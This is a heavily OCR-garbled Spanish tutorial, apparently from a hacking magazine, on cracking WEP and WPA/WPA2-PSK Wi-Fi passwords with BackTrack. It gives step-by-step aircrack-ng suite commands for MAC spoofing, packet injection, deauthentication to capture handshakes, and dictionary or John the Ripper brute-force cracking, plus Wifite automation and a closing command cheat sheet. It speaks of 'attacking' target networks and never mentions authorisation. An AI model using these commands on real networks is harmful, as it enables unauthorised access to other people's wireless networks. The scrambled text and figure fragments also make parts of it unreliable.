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Wireless cracking desde 
cero con Bactrack 

En este artículo les enseñare a crackear WEPs y WPA / WPA2 / PSK desde 

cero con un Uve CD de Backtrack. 


1.WEP Cracking 


cambiar el teclado por el español para que sea 
mas fácil insertar comandos en la consola. 


1.1. Introducción 


Colocamos el DVD con Backtrack y booteamos 
desde la lectora. Veremos algo asi: 



Figura 1. Seleccionamos la resolución a 
gusto nuestro. En este caso (800x600) 


Start BackTrack FrameBuffer (1024x768) 
Start BackTrack FrameBuffer (800x600) 
Start BackTrack Forensics (no suap) 
Start BackTrack in Safe Graphical hode 
Start Persistent Lioe CD 
Start BackTrack in Text hode 
Start BackTrack Graphical hode from Rñh 
Memory Test 

Boot the First Hard Disk 


back I track 


Use the t and 1 keys to select uhich entry is highlighted. 
Press enter to boot the selected OS, 'e' to edit the 
commands before booting, or ' c' for a command-1ine. 


Una vez seleccionada, cargara los archivos 
necesarios y colocaremos en la consola el 
comando: 


startx 

Una vez tipeado, presionamos enter y nos 
llevará al escritorio en donde encontraremos las 
herramientas para trabajar. 

En la parte inferior derecha, veremos una 
bandera... Si damos click con el botón 
secundario de nuestro mouse, podremos 


Starting bosic nctuorking.... 

Startiny kernel euent nanager- 

Loadlng harduare drluers...pllx4_snbus 0060:00:07.0: SflBus base address unlnltlalized - upgrade BIOS or use 
f orcc_addr=0xaddr 

Settlng the systen dock. 

Loading kernel nodules.. .Loading nanual driuers.. .done. 

Settlng kernel uariables (/etc^sysctl.conf)...done. 

Settlng kernel variables (/ctc/'sysctl .d/10-consolc-ncssagcs.conf).. .done. 

Settlng kernel uariables (/'ctc/sysctl .d/10-netuork-security. conf).. .done. 

Settlng kernel uariables </etc/'syscll.d/10-process-security.conf)...done. 

Sctting kernel uariables (/ctc/sysctl.dsuinc.sysctl.conf)...done. 

Starting early crypto disks...done. 

Starting renaining crypto disks...done. 

Checking file systcns...fsck 1.41.3 (lZ-Oct-ZOO0) 

lounting loca1 filesystens...done. 

Hctiuoting suapfilc suap...done. 

Skipping fireuall: ufu Cnot enabled). . .done. 

Settlng up consolé font and keynap...done. 

Loading epufreq kernel nodules...done (none). 

Loading ACPI Modules.... 

Starting ACPI seruices.... 

Starting systen log daenon.... 

Doing Uacon Setup.... 

Starting kernel log daenon- 

Starting systen nessage bus: dbus. 

CPUFreq Utilities: Settlng ondenand CPUFreq gouernor...disabled, gouernor not auailable...done. 

Starting Hardware abstraction layer: ha Id. 

Starting Systen Tools Backends: systen-tools-backends. 

DackTrack 4 (PunSaucc) Pcnctration Tcsting and Auditing Distribution 
rootebt R startx_ 


The quieter you become, the more you are able to Itear. ’ 


Figura 2. 



Click derecho en la bandera, Configure, luego 
buscamos Spain en el menú izquierdo, doble 
click en ella, y ya la podremos seleccionar para 
utilizarla. 



Figura 3. 
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1.2. Cambiando nuestra MAC 

Lo primero que haremos sera cambiar nuestra 
MAC, para que sea mas fácil de recordar. 
Accedemos a la consola y tipeamos: 

airmon-ng 



Figura 4. 

Como vemos en la imagen, mi interfaz se llama: 
wlanO 

Lo que haremos ahora sera detenerla. Para ello 
tipeamos: 

airmon-ng stop wlanO 



Una vez hecho esto tipeamos lo siguiente: 
ifconfig wlanO down 



Figura 6. 

Ahora pasaremos a cambiar nuestraMAC. Para 
ello tipeamos: 

macchanger —mac 
00:11:22:33:44:55 wlanO 



Figura 6. 

Si nos quedo algo como la imagen, quiere decir 
que hemos hecho todos los pasos 
correctamente. 


Figura 5. 
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Finalmente pondremos nuevamente nuestra encriptación WEP. Lo que haremos ahora será 

tarjeta en modo monitor tipeando la siguiente parar el scanneo presionando CTRL + C 

línea: 


airmon-ng start wlanO 



wlanO 

Ralink 2561 PCI rt61pci - [phyO] 


root@bt : # 

airmon-ng stop wlanO 


Interface 

Chipset Oriver 


wlanO 

Ralink 2561 PCI rt61pci - [phyO] 

(monitor mode disabled) 


root@bt :-# ifconfig wlanO down 

root@bt: # macchanger --mac 00:11:22:33:44:55 wlanO 

Current MAC: 00:19:db:9a:b3:lf (unknown) 

Faked MAC: 00:11:22:33:44:55 (Cimsys Inc) 

root@bt: # airmon-ng start wlanO 


Interface 

Chipset Driver 


wlanO 

Ralink 2561 PCI rt61pci - [phyO] 

(monitor mode enabled on mono) 


root@bt: # 

1 



||g|[ <« Shell | 


Figura 8. 

1.3. Buscando Redes 

Para comenzar tipearemos la siguiente línea: 
airodump-ng wlanO 



Figura 9. 

Para este tutoríal configure mi router con una 
pass WEP. 

Como se puede ver, apareció mi red, y tiene 


1.4. Capturando #DATAs 

Tipeamos la siguiente línea: 

airodump-ng -c 1 -w undercOde — 
bssid D8:5D:4C:C7:DC:EE wlanO 



Figura 10. 

Me detendré un poco a explicar. Como podrán 
ver, coloque en azul algunos parámetros. 

En donde está el "1" debemos modificarlo por el 
CANAL, que es en donde está la CH en la Imagen 
10. En mi caso es el canal 1. 

Donde dice undercOde, debemos modificarlo 
por un nombre que nosotros queramos. 

Por último en donde está la MAC, deben colocar 



Figura 11. 
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la MAC que están atacando 
Una vez ejecutada esta línea, comenzara a 
capturar los #DATA, que son datos necesarios 
para luego descifrar la Pass. 


-Tu tarjeta de red no puede hacer inyección de 
paquetes. 

- El router tiene seguridad para evitar este tipo 
de ataques. 


1.5. Asociándonos a la red 

Lo que haremos ahora será asociarnos. Para ello 
abrimos otra consola, SIN CERRAR LA ANTERIOR, 
ya que seguirá capturando los #DATAs que 
necesitaremos mas adelante. 

En la nueva consola tipearemos: 

aireplay-ng -1 0 -a 
D8:5D:4C:C7:DC:EE -h 
00:11:22:33:44:55 -e ANTRAX wlanO 

En esta linea modificaremos lo azul nuevamente. 
En este caso la MAC por la que estamos 
atacando y en donde dice mi nombre por el 
ESSID que estamos atacando, que en mi caso se 
llama ANTRAX. 



Figura 12. 

Si llegamos hasta acá, y nos aparece eso mismo 
de la imagen, quiere decir que hasta el 
momento hemos hecho las cosas a la perfección! 
En caso contrario aparecerá algún tipo de error 
(unsuccessful), las causas pueden ser las 
siguientes: 

- La red a la que quieres atacatar está muy lejos. 


1.6. Inyectando Tráfico 

Tipeamos ahora en la misma consola el 
siguiente comando: 

aireplay-ng -3 -b 
D8:5D:4C:C7:DC:EE -h 
00:11:22:33:44:55 wlanO 

Al igual que antes, modificamos la MAC en azul 
por la que estamos atacando. 

Una vez hecho esto, comenzara a inyectar 
tráfico y los #DATAs comenzaran a subir 
velozmente. 



Figura 13. 

Si llegamos hasta acá, y tenemos todo bien, 
estamos a solo un paso. Recuerden que es 
necesario capturar muchos #DATAs, mientras 
más tengamos mejor. La cantidad de #DATAs 
que debamos capturar dependerá de que tan 
complicada sea la Pass. 
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1.7. Desencriptando la Password 

Hemos llegado al final... En una tercer consola, 
tipearemos lo siguiente: 

aircrack-ng underc0de-01 .cap 

Como siempre modificamos lo azul por el 
nombre que pusimos previamente en el paso 4. 
Al ejecutar el comando, la pass se comenzara a 
desencriptar. 


p 

I Ses 


root@bt: - - Shell - Konsofé 


Session Edit View Bookmarks Settings Help 


|root@bt: ~ - Shell - Konsc 






Aircrack-n 

g 1. 

1 rl738 





[00:00:10] Tested 

1179649 keys 

(got 

243 

IVs) 

KB 

depth 

byte(vote) 






0 

2/ 

3 

B5(1024) 

22( 768) 

24( 768) 

3F( 

768) 

43 ( 

768) 

1 

0/ 

1 

31(1280) 

15( 768) 

2D( 768) 

2E( 

768) 

3D( 

768) 

2 

1/ 

2 

E9(1280) 

A7(1024) 

0B( 768) 

28 ( 

768) 

36 ( 

768) 

3 

0/ 

3 

3B(1024) 

0D(1024) 

B8(1024) 

03 ( 

768) 

19 ( 

768) 

4 

0/ 

1 

1B(1280) 

3E(1024) 

5E(1024) 

F0(1024) 

3C( 

768) 

5 

0/ 

1 

5C(1280) 

01(1024) 

08(1024) 

57(1024) 

68(1024) 

6 

0/ 

1 

AA(1280) 

96(1024) 

F6(1024) 

13( 

768) 

14 ( 

768) 

7 

0/ 

2 

FF(1280) 

DA(1280) 

4E(1024) 

BA(1024) 

02 ( 

768) 

8 

0/ 

1 

BE(1624) 

FB(1024) 

04( 768) 

1D( 

768) 

1E ( 

768) 

9 

0/ 

1 

CC(1624) 

87(1024) 

B0(1024) 

E 3(1024) 

0C( 

768) 

10 

0/ 

1 

E3(1624) 

F4(1024) 

15( 768) 

17 ( 

768) 

2A( 

768) 

11 

0/ 

1 

7E(1536) 

F9(1280) 

8C(1024) 

26 ( 

768) 

27 ( 

768) 

12 

0/ 

1 

20(1136) 

94( 916) 

39( 880) 

58 ( 

880) 

9F( 

732) 

1 













2. WPA / WPA2 Cracking 

2.1. Introducción 

En esta sección les enseñare a crackear WPA / 
WPA2 / PSK desde cero. En la primera parte que 
fue de como crackear WEPs desde cero vimos 
como iniciar desde el DVD de Backtrack, por lo 
tanto arrancaremos con la linea de comandos. 

En primer lugar, colocamos nuestra interfaz en 
modo monitor de la misma forma que el caso 
anterior (WEP Cracking). 

2.2. Capturando el Handshake 

La siguiente línea de comando scanneara las 
redes cercanas: 

airodump-ng monO 


*3 m 

root@bt: - 

Shell - Konsole 

9 m w 

|| Session Edit View 

Bookmarks Settings 

Help 



Figura 14. 

Esperamos un momento a que se desencripte, y 
si todo esta correcto, nos tirara la pass, de lo 
contrario deberemos seguir capturando mas 
#DATAs hasta obtener la pass. 



root@bt: # airmon-ng 

Interface Chipset Oriver 

wlanO Ralink 2561 PCI rt61pci - (phyO] 

root@bt: # airmon-ng start wlan0 

Interface Chipset Oriver 

wlanO Ralink 2561 PCI rt61pci - [phyO] 

(monitor mode enabled on monO) 


root@bt: U airodump-ng mon0| 


3-V i i 


11 :H 


Figura 15. 

Como pueden ver, en mi caso la pass es: under 


Figura 15. 

Como se puede ver, aparece una red llamada 
ANTRAX que será la que atacare. 

De este paso debemos tener en cuenta el canal, 
en este caso es 1. El BSSID y la STATION. 

Una vez que sale la MAC de la red que deseamos 
atacar con una estación, frenamos el scanneo 
presionando CTRL + C 
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Figura 16. 

Ahora tipearemos la siguiente línea: 

airodump-ng monO —channel 1 — 
bssid D8:5D:4C:C7:DC:EE -w 
/tmp/wpa2 



Figura 17. 

Seguido a esto nos aparecerá una imagen de la 
red sin clientes conectados y en otra consola 
tipeamos: 

aireplay-ng -0 1 -a 
D8:5D:4C:C7:DC:EE -c 
70:F1:A1:94:E8:34 monO 


capturar el Handshake. 



Figura 18. 


root@bt: - - Shell - Konsole 



Figura 19. 

Como se puede ver en la imagen 19, hemos 
capturado el Handshake, ahora lo que nos 
queda es desencriptar la password. Esto se 
puede hacer de dos formas. 

1 - Bruteándola con el Jonh The Ripper 

2 - Por medio de Diccionario 

En este tutorial veremos las dos formas. 


Una vez tipeado esto, podremos ver que 
aparecerán redes en la otra consola y podremos 
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2.3. Obteniendo la Clave 

Para hacerla por medio de Aircrack, tipeamos la 
siguiente linea: 


por John The Ripper suelen demorar 
dependiendo la dificultad de la contraseña. 

3. WEP y WPA Cracking con WIFITE 


aircrack-ng -w 

/pentest/passwords/wordlists/wpa. 
txt -b D8:5D:4C:C7:DC:EE 
/tmp/wpa2*.cap 



Figura 20. 

En este caso estoy utilizando el diccionario que 
viene con Backtrack. Ustedes pueden utilizar sus 
propios diccionario y corrigen la ruta del mismo. 
Como podran ver, ahi obtuvo la Clave y en este 
caso es: "thisisatest" 


3.1. Introducción: 

En este tutorial les enseñaré a crackear WEP o 
WPA de una manera sencilla y casi automática 
con WIFITE. 


3.2. Buscando una Red: 


Comenzaremos scanneando y buscaremos una 
red para sacarle la clave. Para ello abrimos una 
consola y tipeamos: 



Ahora veamos la forma de hacerlo por medio de 
John The Ripper. 

Tipeamos el siguiente comando: 

/pentest/password/jtr/john — 
stdout —incremental:all 
aircrack-ng -b D8:5D:4C:C7:DC:EE 
-w - /tmp/wpa2*.cap 


Figura 21. 

Recuerden que en mi caso mi interfaz se llama 
wlanO, ustedes deben colocar la suya. 

Del scanneo debemos tener en cuenta el tipo de 
encriptación, en este caso es una WPA y el canal, 
que aqui es 1. Después paramos el scanneo con 
CTRL + C 

3.3. Interpretando el script wifite 


Recuerden cambiar la MAC por la que están 
atacando y el directorio si es que lo modificaron. 
Ambos métodos, tanto por diccionario como 


En mi caso lo guarde en el escritorio del 
backtrack, por lo tanto debo tipear: 
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python wifite.py 



Figura 22. 

Una vez tipeado, presionamos enter y se nos 
abrira el GUI o el entorno gráfico de la tool. 


3.4. Configurando el WIFITE 


WiFite GU 


irrtfirface: inO Ralink 2561 PCI rlfilfici - [phy^j 
encryption type: 


WPA 


channel: 


1 


_ allchannels 


mínimum fiüwer: 


_ select targeta frúrti liat 
50 


everyúrte 


dictionary: rds/wíirdliata.'darkcOde.Ist 


vueptimeout{mirO: 10 endleaa 

wpa tirneout{mirfl: 5 _| endleaa 


wepoptiona: ■ arp-replay '■ chop-chop 

■ frag menta tion ■ -p0841 

■ changa mac J ignore fake-auth 
500 


packeta/aec: 


_ anonymize all attacka 


h4x0r 1t n40 


Figura 23. 


Bueno como ven en la imagen 23, coloque mi 
interfaz, el tipo de encriptación (WPA) y el canal 
(1). 

Lo otro que pueden modificar es la dirección del 
diccionario por uno propio que tengan. En este 
tutorial usare el que viene por defecto. 

Una vez hecho eso, presionamos el boton rojo 
"h4x0r1tn40" 

3.5. Buscando el Handshake y 
desencryptando la pass 

Al ser todo automático, solo debemos esperar a 
que busque solo el Handshake y saque la pass: 


■ IS1 WiFite 19 ■ 


UiFite rB8 


: wass UEP/UPA cracker 


designed for backtrack4 


[+] using uireless interface "wlanO" 

[+3 onlg scanning for UPA-encrypted networks 

[+3 only looking for networks on channel 1 
[+3 targeting essid "511“ 

[♦3 using díctionary " /pentest/passuords/word1 1 sts/darkcOde .lst" 

[+3 set wep attack wait tiñe: 10 minutes 
[+3 set wpa handshake wait time: 5 minutes 
[♦3 set UEP replay pps: 500/sec 

[+] searching for devices in monitor mode... 

(♦] using interface "wlanO" 

(♦] uaiting 13 seconds for targets to appear. press Ctrl*C to skip the wait | 


■ ® WiFite m ■ ■ 

:: :: ( ) :: :: nass UEP/UPA cracker 

':. ':. /_\ 

:. ':. /_\ ,: designed for backtrack4 

/ _ \ 

/ \ 

[♦] using wireless interface "ulanO" 

(+3 only scanning for UPA-encrypted retworks 

[♦3 only looking for networks on chame 1 1 
[+3 targeting essid "all" 

(+3 using dictionary " i darkcOde.lst" 

[♦3 set wep attack wait time: lú Minutes 
[♦] set wpa handshake wait time: 5 minutes 
[+3 set UEP replay pps: 500/sec 

[+] searching for devices in monitor mode... 

(+3 using interface "wlanO" 

[+] waiting 1 seconds for targets to appear. press Ctrl+C to skip the wait 

[0:00:21] 1 targets and 1 cliente found 
[+] targeting: "ANTRAX" 

[♦] estimated máximum wait time is 05 minutes 

[♦] attacking "hNTRAX"... 

[0:05:00] starting wpa handshake capture 
[0:04:52] added rew clie-tt: D8:5D:4C:BC:34:0B, retal: 

[0:04:52] added rew :lient: 70:F1:A1:94:E8:34, total: 

[0:04:41] sent 3 deauth packets; no handshake yet | 


: ( ) : 

/_\ 

/ _ \ 

/ _ \ 

/ \ 
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[+] using wireless interface "ulanO" 

[+] only scanning for UPA-encrypted networks 

[♦] only looking for networks on channel 1 
[♦] targeting essid "all" 

[+] using dictionary Vpentest/passwords/wordlists/darkcOde.lst" 

í+] set wep attack wait time: 10 inutes 
[+] set wpa handshake wait time: 5 minutes 
[+] set UEP replay pps: 500/sec 

[♦] searching for dewices in monitor mode... 

[+3 using interface “wlanO" 

[♦] waiting 1 seconds for targets to appear. press Ctrl+C to skip the wait 

[0:00:21] : targets and 1 clíents found 
[♦] targeting: "ANTRAX" 

[♦] estimated máximum wait time i$ 05 minutes < 

[+] attacking "ANTRAX"... 

[0:06:00] starting wpa handshake capture 

[0:04:52] added new Client: D8:5D:4C:BC:34:0B, total: 2 ' 

[0:04:52] added r.ew clie-it: 70:F1:A1:94:E8:34, total: 3 

[0:04:10] sent 3 deauth packets; handshake capture 1 saved as "hs/HNTRAX.cap" 

[0:04:10] stripped handshake using pyrit 


[0:00:00] started cracking UPA key for "ANTRAX" using aircrack-ng; 

[0:00:00] using /pentest/passwords/wordhsts/darkcOde.lst (1707G59 passwords) 

[0:00:06] cracking;I>02.72 k/s; 723 keys total: 02 eta: 2:20:50 

WiFit* <2> 15 9 m 

[♦] using interface 

[♦] waiting 1 seconds for targets to appear. press Ctrl+C to skip the wait 

[0:00:21] : targets and 1 clients foiaid 
[♦] targeting: "ANTRAX" 

[+] estimated máximum wait time is 05 minutes 

[+] attacking "ÁNTRAX"... 

[0:06:00] starting wpa handshake capture 

[0:04:54] ,i - i uní. : D8:5D:4C:BC:34:0B, total: 2 

[0:04:54] -,!•:■• ¡= 70:F1:A1:94:E8:34, !: 

[0:01:59] sent 3 deauth packets; m M .re: 1 saved as "hs/ANTRAX.cap" 

[0:01:59] strjpped handshake using pyrit 


[0:00:00] started cracking UPA key for "ANTRAX" using aircrack-ng; 

[0:00:00] using pente-t./passwords/wordlists/darkr ( passwords) 

[0:20:12] cracking; 103.30 k/s; 1374049 keys total; 1002 eta: 0:00:00 

[0:20:12] cracked "ANTRAX"! the key is: malwares" 

[+] attack is copíete: 1 handshake, 1 cracked 
[+] session s um m ary: 

-cracked UPA key for "ANTRAX" (D8:5D:4C:C7:BC:EE), the key is: "malwares" 


[!] cióse this window at any time to exit wifite 


Bueno como podemos ver, pudo sacar la 
contraseña que en mi caso es "malwares" 
Finalmente crea un Log, con un texto como el 
siguiente: 

[2011-04-02 22:59:31] cracked 
WPA key for "ANTRAX" 
(D8:5D:4C:C7:DC:EE), the key is: 
"malwares" 
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Resumen de códigos 

I.WEP's: 

NOTA: En todos los casos reemplazar: 

XXXX: Interface 
ZZZZ: Canal 
YYYY: MAC BSSID 
RRR: ESSID 

1.1. Cambiar la MAC: 

A. airmon-ng (Ver la interface que usamos) 

B. airmon-ng stop XXXX (Detenemos el modo monitor) 

C. ifconfig XXXX down (Tiramos nuestra interface) 

D. macchanger --mac 00:11:22:33:44:55 XXXX (Cambiamos nuestra MAC, 
en este caso sera 00:11:22:33:44:55) 

E. airmon-ng start XXXX (Volvemos a iniciar el modo monitor) 

1.2. Buscar Redes: 

F. airodump-ng XXXX ( Scannea Redes) 

G. CTRL + C (Detiene el scanneo) 

H. airodump-ng -c ZZZZ -w datas —bssid YYYY XXXX (Capturamos 
#DATAs) [No cerrar consola] 

1.3. Asociándonos a la red (En otra consola): 

I. aireplay-ng -1 0 -a YYYY -h 00:11:22:33:44:55 -e RRR XXXX 
(Asociación con la red) 

I. 4 Inyectando Trafico: 

J. aireplay-ng -3 -b YYYY -h 00:11:22:33:44:55 XXXX (Captura Datas a 
mas velocidad) 

1.5. Desencriptando la Clave (En otra consola): 

K. aircrack-ng datas-Ol.cap (Desencripta la clave con Aircrack) 

2. WPA/WPA2/PSK: 

NOTA: En todos los casos reemplazar: 

XXXX: Interface 

ZZZZ: Canal 

YYYY: MAC BSSID 

RRR: Interface modo monitor 

TTTT: Station 
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2.1. Colocar la interface en modo monitor 

A. aimon-ng (Saber nuestra Interface) 

B. airmon-ng start XXXX (Colocamos en modo monitor nuestra Interface) 


2.2. Capturando el Handshake: 

C. airodump-ng RRR (Scannea redes) 

D. CTRL + C (Frena el scanneo) 

E. airodump-ng RRR —channel 1 —bssid YYYY -w /tmp/wpa2 (Guardara 
los *.cap en el directorio que le indicamos) 

F. aireplay-ng -0 1 -a YYYY -c TTTT RRR (Comenzara la captura del 
Handshake) 


2.3 Obteniendo la Clave: 

G.l. aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b YYYY 
/tmp/wpa2*.cap (Saca la Pass por Diccionario) 

G.2. /pentest/password/jtr/john —stdout —incremental:all | 
aircrack-ng -b YYYY -w - /tmp/wpa2*.cap (Saca la Pass por Fuerza 
Bruta con John The Ripper) 


11 


www.hadkMcra.dk.es 




